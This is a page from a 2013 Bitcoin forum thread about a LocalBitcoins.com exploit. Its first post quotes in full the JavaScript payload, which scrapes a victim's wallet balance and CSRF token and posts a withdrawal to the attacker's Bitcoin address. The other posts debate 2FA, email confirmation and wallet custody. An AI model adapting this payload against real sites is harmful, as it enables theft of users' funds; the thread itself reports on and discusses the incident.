Bitcoin Forum
November 01, 2024, 11:43:56 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 [3]  All
  Print  
Author Topic: LocalBitcoins.com exploit!  (Read 6087 times)
runeks
Legendary
*
Offline Offline

Activity: 980
Merit: 1008



View Profile WWW
September 13, 2013, 12:43:32 PM
 #41

This is the exploit in question:

Code:
function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051
Mike Hearn
Legendary
*
Offline Offline

Activity: 1526
Merit: 1134


View Profile
September 13, 2013, 02:18:13 PM
 #42

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.
herzmeister (OP)
Legendary
*
Offline Offline

Activity: 1764
Merit: 1007



View Profile WWW
September 13, 2013, 02:23:07 PM
 #43

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for neither buyer nor seller. All that's required is that seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.

https://localbitcoins.com/?ch=80k | BTC: 1LJvmd1iLi199eY7EVKtNQRW3LqZi8ZmmB
marcovaldo
Sr. Member
****
Offline Offline

Activity: 350
Merit: 250



View Profile
September 13, 2013, 02:50:44 PM
 #44

Did you personnaly lose anything?

BITEX
            ███     ███     ███
              ███     ███     ███
                ███     ███     ███
                  ███     ███     ███
                    ███     ███     ███
                      ███     ███     ███
                        ███     ███     ███
                          ███     ███     ███
                            ███     ███     ███
                              ███     ███     ███
                            ███     ███     ███
                          ███     ███     ███
                        ███     ███     ███
                      ███     ███     ███
                    ███     ███     ███
                  ███     ███     ███
                ███     ███     ███
              ███     ███     ███
            ███     ███     ███

The First Locally-Embedded, Yet Global, Crypto-Bank
TELEGRAM    FACEBOOK   TWITTER    YOUTUBE    LINE

                  ███     ███     ███
                ███     ███     ███
              ███     ███     ███
            ███     ███     ███
          ███     ███     ███
        ███     ███     ███
      ███     ███     ███
    ███     ███     ███
  ███     ███     ███
███     ███     ███
  ███     ███     ███
    ███     ███     ███
      ███     ███     ███
        ███     ███     ███
          ███     ███     ███
            ███     ███     ███
              ███     ███     ███
               ███     ███     ███
                 ███     ███     ███

WHITEPAPER | ANN
JOIN WHITELIST NOW!
MPOE-PR
Hero Member
*****
Offline Offline

Activity: 756
Merit: 522



View Profile
September 13, 2013, 02:54:57 PM
 #45

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now its at the same stage like the "Piratenpartei" in germany: sympathic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and becomes ridiculous when trying.

Don't write a code, go to your local bank, ask for an internship and learn how moneys works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.
johnyj
Legendary
*
Offline Offline

Activity: 1988
Merit: 1012


Beyond Imagination


View Profile
September 13, 2013, 02:56:34 PM
 #46

bitcoin withdraw should be authenticated through email

BitAddict
Legendary
*
Offline Offline

Activity: 1190
Merit: 1001



View Profile
September 13, 2013, 03:02:44 PM
 #47

bitcoin withdraw should be authenticated through email

With 2FA I think is enough
johnyj
Legendary
*
Offline Offline

Activity: 1988
Merit: 1012


Beyond Imagination


View Profile
September 13, 2013, 03:04:20 PM
 #48

bitcoin withdraw should be authenticated through email

With 2FA I think is enough

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different sim card

Cryddit
Legendary
*
Offline Offline

Activity: 924
Merit: 1132


View Profile
September 13, 2013, 03:29:35 PM
 #49

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I believe more a company than the average private seller... How did you buy your bitcoins, sir?

Some I bought them from Bitstamp.  And moved them the instant they showed up in Bitstamp account, to my private wallet.  

Some I got for pay - made machine parts for someone. She wanted pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody wanted special exclusive super-secret software analyze enormous big pile of data, paid Bitcoin to keep private from someone else looking at bank account.

Some others I got for pay - Main job, security consult.  I look at malware, see what it does by read machine code, figure out how to clean infected machines.  Clients implement, or I implement, cleaning software, clients then sell.  Pays well.  Twice now I asked pay me in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from speculator got nervous back when price was USD$60.

joesmoe2012
Hero Member
*****
Offline Offline

Activity: 882
Merit: 501


Ching-Chang;Ding-Dong


View Profile WWW
September 13, 2013, 06:26:24 PM
 #50

You can make 2FA work with differenet SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if your dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins behalf in paying out of their pocket for all the stolen coins.

Check out BitcoinATMTalk - https://bitcoinatmtalk.com
smoothie
Legendary
*
Offline Offline

Activity: 2492
Merit: 1474


LEALANA Bitcoin Grim Reaper


View Profile
September 14, 2013, 03:37:02 AM
 #51

As the saying goes:

Those who fail to learn from history are doomed to repeat it.



███████████████████████████████████████

            ,╓p@@███████@╗╖,           
        ,p████████████████████N,       
      d█████████████████████████b     
    d██████████████████████████████æ   
  ,████²█████████████████████████████, 
 ,█████  ╙████████████████████╨  █████y
 ██████    `████████████████`    ██████
║██████       Ñ███████████`      ███████
███████         ╩██████Ñ         ███████
███████    ▐▄     ²██╩     a▌    ███████
╢██████    ▐▓█▄          ▄█▓▌    ███████
 ██████    ▐▓▓▓▓▌,     ▄█▓▓▓▌    ██████─
           ▐▓▓▓▓▓▓█,,▄▓▓▓▓▓▓▌          
           ▐▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▌          
    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓─  
     ²▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╩    
        ▀▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▀       
           ²▀▀▓▓▓▓▓▓▓▓▓▓▓▓▀▀`          
                   ²²²                 
███████████████████████████████████████

. ★☆ WWW.LEALANA.COM        My PGP fingerprint is A764D833.                  History of Monero development Visualization ★☆ .
LEALANA BITCOIN GRIM REAPER SILVER COINS.
 
justusranvier
Legendary
*
Offline Offline

Activity: 1400
Merit: 1013



View Profile
September 14, 2013, 03:40:39 AM
 #52

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
joesmoe2012
Hero Member
*****
Offline Offline

Activity: 882
Merit: 501


Ching-Chang;Ding-Dong


View Profile WWW
September 14, 2013, 08:51:22 AM
 #53

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

Check out BitcoinATMTalk - https://bitcoinatmtalk.com
BitAddict
Legendary
*
Offline Offline

Activity: 1190
Merit: 1001



View Profile
September 14, 2013, 11:22:17 AM
 #54

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.
johnyj
Legendary
*
Offline Offline

Activity: 1988
Merit: 1012


Beyond Imagination


View Profile
September 14, 2013, 12:15:56 PM
 #55

At lease an email based 2FA is much better

rufusBTC
Jr. Member
*
Offline Offline

Activity: 121
Merit: 1

The World’s First Blockchain Core


View Profile
September 14, 2013, 05:10:08 PM
 #56

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. THey use 2FA for withdraw confirmation as well. I don't think that this exploit effected anybody who had 2FA enabled. 

+1

You can't withdrawal without 2FA code, if enabled.

looks like the exploit just sucked out peoples BTC, through a loophole even if they had 2FA.

▄▄▄▄▄▄▄▄▄▄▄ ▄ ■       SKYNET.co       ■ ▄ ▄▄▄▄▄▄▄▄▄▄▄
▐▬▬▬▬▬▬▬▬▬     PRIVATE SALE is LIVE     ▬▬▬▬▬▬▬▬▬▌
niko
Hero Member
*****
Offline Offline

Activity: 756
Merit: 501


There is more to Bitcoin than bitcoins.


View Profile
September 14, 2013, 06:46:59 PM
 #57

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

They're there, in their room.
Your mining rig is on fire, yet you're very calm.
willphase
Hero Member
*****
Offline Offline

Activity: 767
Merit: 500


View Profile
September 14, 2013, 10:21:22 PM
 #58

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will

herzmeister (OP)
Legendary
*
Offline Offline

Activity: 1764
Merit: 1007



View Profile WWW
September 14, 2013, 10:22:58 PM
 #59

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  Angry

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

https://localbitcoins.com/?ch=80k | BTC: 1LJvmd1iLi199eY7EVKtNQRW3LqZi8ZmmB
niko
Hero Member
*****
Offline Offline

Activity: 756
Merit: 501


There is more to Bitcoin than bitcoins.


View Profile
September 15, 2013, 01:58:31 AM
 #60

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

did you mean because i linked to the forum in the OP? no, that link was safe, or what do you think of me  Angry

the exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
Ten days ago I was browsing through LBC Site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.

They're there, in their room.
Your mining rig is on fire, yet you're very calm.
Pages: « 1 2 [3]  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!